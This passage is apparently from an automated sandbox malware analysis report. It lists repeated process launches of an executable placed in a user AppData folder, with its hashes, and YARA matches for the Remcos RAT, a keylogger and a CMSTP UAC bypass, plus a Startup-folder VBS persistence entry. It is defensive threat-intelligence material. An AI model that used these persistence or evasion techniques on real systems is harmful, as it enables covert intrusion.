                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:01:05:03
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:01:05:04
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:01:05:05
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:01:05:06
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:01:05:07
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:01:05:07
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:01:05:08
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                                                    Imagebase:0xff9b0000
                                                    File size:168'960 bytes
                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:01:05:10
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:01:05:11
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:01:05:12
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:01:05:12
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:01:05:13
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:01:05:13
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:01:05:14
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:01:05:14
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
